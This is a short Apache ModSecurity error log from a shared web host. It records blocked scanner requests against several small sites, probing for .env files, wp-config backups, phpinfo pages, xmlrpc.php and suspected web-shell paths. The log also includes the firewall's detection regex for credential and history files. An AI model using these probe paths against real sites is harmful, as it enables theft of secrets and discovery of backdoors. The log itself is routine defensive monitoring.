[Tue May 26 13:47:43.075964 2026] [security2:error] [pid 555743:tid 555898] [client 57.141.2.59:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVXJsjqAquC0YaxQjCk1AAAASM"]
[Tue May 26 13:47:43.910909 2026] [security2:error] [pid 555743:tid 555966] [client 45.148.10.159:48148] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.old$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1263"] [id "390583"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .old)"] [severity "CRITICAL"] [hostname "mail.soto-plumbing.com"] [uri "/.env.old"] [unique_id "ahVXJ8jqAquC0YaxQjCk-QAAAWc"]
[Tue May 26 13:47:44.066207 2026] [security2:error] [pid 544395:tid 544480] [remote 51.91.98.45:36256] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 45.98.91.51.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "tea.canopykaapi.com"] [uri "/wp-login.php"] [unique_id "ahVXJxmrs7g3RMCdp8XuCgAAXlQ"]
[Tue May 26 13:47:44.328686 2026] [security2:error] [pid 555743:tid 555933] [client 45.148.10.159:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mail.soto-plumbing.com"] [uri "/index.php"] [unique_id "ahVXKMjqAquC0YaxQjClBAAAAUY"]
[Tue May 26 13:47:44.407584 2026] [security2:error] [pid 555743:tid 555945] [client 57.141.2.40:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVXJ8jqAquC0YaxQjCk_AAAAVI"]
[Tue May 26 13:47:44.903090 2026] [security2:error] [pid 555743:tid 555929] [client 79.51.36.84:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVXKMjqAquC0YaxQjClDAAAAUI"]
[Tue May 26 13:47:45.313215 2026] [security2:error] [pid 555743:tid 555899] [client 45.148.10.159:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mail.soto-plumbing.com"] [uri "/index.php"] [unique_id "ahVXKcjqAquC0YaxQjClGwAAASQ"]
[Tue May 26 13:47:45.613363 2026] [security2:error] [pid 555743:tid 555893] [client 129.222.147.134:59180] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 134.147.222.129.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "ivwellnessresources.org"] [uri "/xmlrpc.php"] [unique_id "ahVXKcjqAquC0YaxQjClJAAAAR4"]
[Tue May 26 13:47:45.613510 2026] [security2:error] [pid 555743:tid 555893] [client 129.222.147.134:59180] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "ivwellnessresources.org"] [uri "/xmlrpc.php"] [unique_id "ahVXKcjqAquC0YaxQjClJAAAAR4"]
[Tue May 26 13:47:45.733315 2026] [security2:error] [pid 555743:tid 555971] [client 45.148.10.159:48148] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "mail.soto-plumbing.com"] [uri "/crm/.env"] [unique_id "ahVXKcjqAquC0YaxQjClJgAAAWw"]
[Tue May 26 13:47:45.970816 2026] [security2:error] [pid 555743:tid 555937] [client 45.148.10.159:48148] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "mail.soto-plumbing.com"] [uri "/local/.env"] [unique_id "ahVXKcjqAquC0YaxQjClMQAAAUo"]
[Tue May 26 13:47:46.144913 2026] [core:crit] [pid 555743:tid 555958] (13)Permission denied: [client 40.77.167.56:0] AH00529: /home1/taote1zo/public_html/nigeriahomebuilders.com/.htaccess pcfg_openfile: unable to check htaccess file, ensure it is readable and that '/home1/taote1zo/public_html/nigeriahomebuilders.com/' is executable
[Tue May 26 13:47:46.220201 2026] [security2:error] [pid 555743:tid 555921] [client 57.141.2.67:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVXKcjqAquC0YaxQjClKQAAATo"]
[Tue May 26 13:47:46.232977 2026] [security2:error] [pid 555743:tid 555934] [client 45.148.10.159:48148] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "mail.soto-plumbing.com"] [uri "/core/.env"] [unique_id "ahVXKsjqAquC0YaxQjClPgAAAUc"]
[Tue May 26 13:47:46.459956 2026] [security2:error] [pid 555743:tid 555887] [client 45.148.10.159:48148] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "mail.soto-plumbing.com"] [uri "/apps/.env"] [unique_id "ahVXKsjqAquC0YaxQjClQQAAARg"]
[Tue May 26 13:47:46.699881 2026] [security2:error] [pid 555743:tid 555895] [client 45.148.10.159:48148] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "mail.soto-plumbing.com"] [uri "/application/.env"] [unique_id "ahVXKsjqAquC0YaxQjClRgAAASA"]
[Tue May 26 13:47:46.855140 2026] [security2:error] [pid 555743:tid 555926] [client 2.58.56.55:50443] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "lifestylemne.me"] [uri "/index.php"] [unique_id "ahVXKsjqAquC0YaxQjClSQAAAT8"], referer: www.google.com
[Tue May 26 13:47:46.883173 2026] [security2:error] [pid 555743:tid 555998] [client 2.58.56.55:51770] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 55.56.58.2.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "lifestylemne.me"] [uri "/wp-content/themes/seotheme/db.php"] [unique_id "ahVXKsjqAquC0YaxQjClSgAAAYc"], referer: www.google.com
[Tue May 26 13:47:46.906712 2026] [security2:error] [pid 544395:tid 544569] [client 2.58.56.55:50445] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 55.56.58.2.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "lifestylemne.me"] [uri "/wp-plain.php"] [unique_id "ahVXKhmrs7g3RMCdp8XuLAAAACw"], referer: www.google.com
[Tue May 26 13:47:46.920568 2026] [security2:error] [pid 544395:tid 544541] [client 2.58.56.55:50444] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 55.56.58.2.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "lifestylemne.me"] [uri "/wp-content/plugins/fix/up.php"] [unique_id "ahVXKhmrs7g3RMCdp8XuLQAAABA"]
[Tue May 26 13:47:46.955166 2026] [security2:error] [pid 555743:tid 555978] [client 45.148.10.159:48148] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "mail.soto-plumbing.com"] [uri "/web/.env"] [unique_id "ahVXKsjqAquC0YaxQjClTgAAAXM"]
[Tue May 26 13:47:47.086062 2026] [security2:error] [pid 555743:tid 555951] [client 2.58.56.55:51440] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 55.56.58.2.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "lifestylemne.me"] [uri "/gwltsqqt.php"] [unique_id "ahVXK8jqAquC0YaxQjClUwAAAVg"], referer: www.google.com
[Tue May 26 13:47:47.167854 2026] [security2:error] [pid 555743:tid 555890] [client 2.58.56.55:50443] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "lifestylemne.me"] [uri "/index.php"] [unique_id "ahVXK8jqAquC0YaxQjClVAAAARs"], referer: www.google.com
[Tue May 26 13:47:47.296651 2026] [security2:error] [pid 544395:tid 544528] [client 45.148.10.159:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mail.soto-plumbing.com"] [uri "/index.php"] [unique_id "ahVXKxmrs7g3RMCdp8XuMwAAAAM"]
[Tue May 26 13:47:47.360179 2026] [security2:error] [pid 555743:tid 555942] [client 2.58.56.55:50466] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 55.56.58.2.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "lifestylemne.me"] [uri "/wp-content/themes/seotheme/db.php"] [unique_id "ahVXK8jqAquC0YaxQjClWQAAAU8"], referer: www.google.com
[Tue May 26 13:47:47.398159 2026] [security2:error] [pid 555743:tid 555899] [client 20.206.67.134:4946] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 134.67.206.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "ivwellnessresources.org"] [uri "/gzxpaviw.php"] [unique_id "ahVXK8jqAquC0YaxQjClXgAAASQ"], referer: www.google.com
[Tue May 26 13:47:47.487447 2026] [security2:error] [pid 544395:tid 544651] [client 208.91.198.85:41796] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.bloggertarget.com"] [uri "/index.php"] [unique_id "ahVXKxmrs7g3RMCdp8XuNwAAAH4"], referer: https://www.bloggertarget.com
[Tue May 26 13:47:47.536952 2026] [security2:error] [pid 555743:tid 555971] [client 45.148.10.159:48148] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-config\\\\.php(?:\\\\W[a-z]*|bak)" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "300"] [id "900256"] [msg "Wp-Config Backup/edit file request"] [hostname "mail.soto-plumbing.com"] [uri "/wp-config.php.bak"] [unique_id "ahVXK8jqAquC0YaxQjClYgAAAWw"]
[Tue May 26 13:47:47.608478 2026] [security2:error] [pid 555743:tid 555905] [client 2.58.56.55:60863] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 55.56.58.2.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "lifestylemne.me"] [uri "/wp-plain.php"] [unique_id "ahVXK8jqAquC0YaxQjClZAAAASo"], referer: www.google.com
[Tue May 26 13:47:47.676060 2026] [security2:error] [pid 555743:tid 555977] [client 208.91.198.85:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.bloggertarget.com"] [uri "/index.php"] [unique_id "ahVXK8jqAquC0YaxQjClYQAAAXI"], referer: https://www.bloggertarget.com
[Tue May 26 13:47:47.684202 2026] [security2:error] [pid 555743:tid 555882] [client 20.206.67.134:4872] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 134.67.206.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "ivwellnessresources.org"] [uri "/plugins/content/apismtp/apismtp.php"] [unique_id "ahVXK8jqAquC0YaxQjClZQAAARM"]
[Tue May 26 13:47:47.687904 2026] [security2:error] [pid 555743:tid 555976] [client 2.58.56.55:61389] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 55.56.58.2.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.lifestylemne.me"] [uri "/wp-content/plugins/apikey/apikey.php"] [unique_id "ahVXK8jqAquC0YaxQjClZgAAAXE"]
[Tue May 26 13:47:48.329754 2026] [security2:error] [pid 544395:tid 544561] [client 45.148.10.159:48152] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 159.10.148.45.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "mail.soto-plumbing.com"] [uri "/info.php"] [unique_id "ahVXLBmrs7g3RMCdp8XuTgAAACQ"]
[Tue May 26 13:47:48.544032 2026] [security2:error] [pid 544395:tid 544549] [client 57.141.2.37:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVXLBmrs7g3RMCdp8XuRwAAABg"]
[Tue May 26 13:47:48.682006 2026] [security2:error] [pid 555743:tid 555936] [client 4.201.75.230:5452] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 230.75.201.4.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "athelstan.org.in"] [uri "/about.php"] [unique_id "ahVXLMjqAquC0YaxQjClawAAAUk"]
[Tue May 26 13:47:48.990803 2026] [security2:error] [pid 544395:tid 544607] [client 2.58.56.55:52229] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 55.56.58.2.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "lifestylemne.me"] [uri "/inavbhkc.php"] [unique_id "ahVXLBmrs7g3RMCdp8XuVQAAAFI"], referer: www.google.com
[Tue May 26 13:47:48.997521 2026] [security2:error] [pid 555743:tid 555950] [client 2.58.56.55:54267] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 55.56.58.2.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.lifestylemne.me"] [uri "/plugins/content/apismtp/apismtp.php"] [unique_id "ahVXLMjqAquC0YaxQjClbgAAAVc"]
[Tue May 26 13:47:49.033589 2026] [security2:error] [pid 544395:tid 544535] [client 45.148.10.159:48160] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 159.10.148.45.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "mail.soto-plumbing.com"] [uri "/dashboard/phpinfo.php"] [unique_id "ahVXLRmrs7g3RMCdp8XuVgAAAAo"]
[Tue May 26 13:47:49.336230 2026] [security2:error] [pid 544395:tid 544614] [client 2.58.56.55:62046] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 55.56.58.2.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.lifestylemne.me"] [uri "/wp-content/plugins/apikey/apikey.php.suspected"] [unique_id "ahVXLRmrs7g3RMCdp8XuYAAAAFk"]
[Tue May 26 13:47:49.731991 2026] [security2:error] [pid 555743:tid 555948] [client 57.141.2.46:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVXLcjqAquC0YaxQjCldwAAAVU"]
[Tue May 26 13:47:49.942045 2026] [security2:error] [pid 544395:tid 544638] [client 2.58.56.55:56222] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 55.56.58.2.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.lifestylemne.me"] [uri "/plugins/content/apismtp/apismtp.php.suspected"] [unique_id "ahVXLRmrs7g3RMCdp8XuYwAAAHE"]
[Tue May 26 13:47:50.325283 2026] [security2:error] [pid 544395:tid 544498] [remote 74.7.241.58:45342] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 58.241.7.74.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.billing.mosykay.com"] [uri "/app/password/reset"] [unique_id "ahVXLhmrs7g3RMCdp8XuZAAAG2Y"], referer: https://www.billing.mosykay.com/app/password/reset?path=/home1/taote1zo/public_html/mosykay.com/account/resources/lang/fl
[Tue May 26 13:47:50.348612 2026] [security2:error] [pid 544395:tid 544537] [client 74.7.175.183:33610] ModSecurity: Warning. Matched phrase "oBot" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "404"] [hostname "www.quickdeliveryexp.com"] [uri "/cgi-sys/404.html"] [unique_id "ahVXLhmrs7g3RMCdp8XuZwAADE4"]
[Tue May 26 13:47:50.378244 2026] [security2:error] [pid 555743:tid 555906] [client 4.201.75.230:6114] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 230.75.201.4.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "athelstan.org.in"] [uri "/file.php"] [unique_id "ahVXLsjqAquC0YaxQjClhwAAASs"]
[Tue May 26 13:47:50.508038 2026] [security2:error] [pid 555743:tid 555912] [client 74.7.228.16:54706] ModSecurity: Warning. Matched phrase "oBot" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "404"] [hostname "www.quickdeliveryexp.com.onesoft.in"] [uri "/cgi-sys/404.html"] [unique_id "ahVXLsjqAquC0YaxQjCligABMVk"]
[Tue May 26 13:47:50.564537 2026] [security2:error] [pid 555743:tid 555968] [client 45.148.10.159:37338] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 159.10.148.45.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "mail.soto-plumbing.com"] [uri "/admin/server_info.php"] [unique_id "ahVXLsjqAquC0YaxQjCliwAAAWk"]
[Tue May 26 13:47:51.338152 2026] [security2:error] [pid 544395:tid 544616] [client 45.148.10.159:37340] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 159.10.148.45.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "mail.soto-plumbing.com"] [uri "/server_info.php"] [unique_id "ahVXLxmrs7g3RMCdp8XudAAAAFs"]
[Tue May 26 13:47:51.861153 2026] [security2:error] [pid 555743:tid 555992] [client 89.124.114.167:24416] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 167.114.124.89.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.yourstorybag.com"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ahVXL8jqAquC0YaxQjClmQAAAYE"], referer: http://www.yourstorybag.com/blog/
[Tue May 26 13:47:52.061838 2026] [security2:error] [pid 544395:tid 544651] [client 57.141.2.5:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVXLxmrs7g3RMCdp8XuegAAAH4"]
[Tue May 26 13:47:52.067661 2026] [security2:error] [pid 555743:tid 555971] [client 45.148.10.159:37346] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 159.10.148.45.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "mail.soto-plumbing.com"] [uri "/app_dev.php/_profiler/phpinfo"] [unique_id "ahVXMMjqAquC0YaxQjCloAAAAWw"]
[Tue May 26 13:47:52.884095 2026] [security2:error] [pid 555743:tid 555883] [client 45.148.10.159:37360] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 159.10.148.45.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "mail.soto-plumbing.com"] [uri "/test.php"] [unique_id "ahVXMMjqAquC0YaxQjClsgAAARQ"]
[Tue May 26 13:47:53.020791 2026] [security2:error] [pid 555743:tid 555911] [client 106.192.248.115:60844] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 115.248.192.106.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "thriveswift.com"] [uri "/xmlrpc.php"] [unique_id "ahVXMcjqAquC0YaxQjClugAAATA"]
[Tue May 26 13:47:53.021149 2026] [security2:error] [pid 555743:tid 555911] [client 106.192.248.115:60844] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "thriveswift.com"] [uri "/xmlrpc.php"] [unique_id "ahVXMcjqAquC0YaxQjClugAAATA"]
[Tue May 26 13:47:53.658057 2026] [security2:error] [pid 544395:tid 544636] [client 45.148.10.159:37372] ModSecurity: Access denied with code 406 (phase 2). Match of "ipMatch 127.0.0.1,::1" against "REMOTE_ADDR" required. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "724"] [id "340114"] [rev "2"] [msg "Atomicorp.com WAF Rules: Apache admin service access attempt"] [severity "CRITICAL"] [hostname "mail.soto-plumbing.com"] [uri "/server-info"] [unique_id "ahVXMRmrs7g3RMCdp8XukQAAAG8"]
[Tue May 26 13:47:53.890121 2026] [security2:error] [pid 555743:tid 555957] [client 57.141.2.39:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVXMcjqAquC0YaxQjClyAAAAV4"]
[Tue May 26 13:47:53.941827 2026] [security2:error] [pid 544395:tid 544538] [client 45.148.10.159:37372] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 159.10.148.45.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "mail.soto-plumbing.com"] [uri "/server-info.php"] [unique_id "ahVXMRmrs7g3RMCdp8XukwAAAA0"]
[Tue May 26 13:47:53.961337 2026] [security2:error] [pid 555743:tid 555898] [client 152.59.18.132:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "ucdc.co.in"] [uri "/index.php"] [unique_id "ahVXMcjqAquC0YaxQjCl0QAAASM"], referer: https://www.ucdc.co.in/
[Tue May 26 13:47:54.303853 2026] [autoindex:error] [pid 555743:tid 555905] [client 152.59.18.132:0] AH01276: Cannot serve directory /home2/ucdccoin/public_html/upload/slider/: No matching DirectoryIndex (index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.php,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: https://www.ucdc.co.in/home
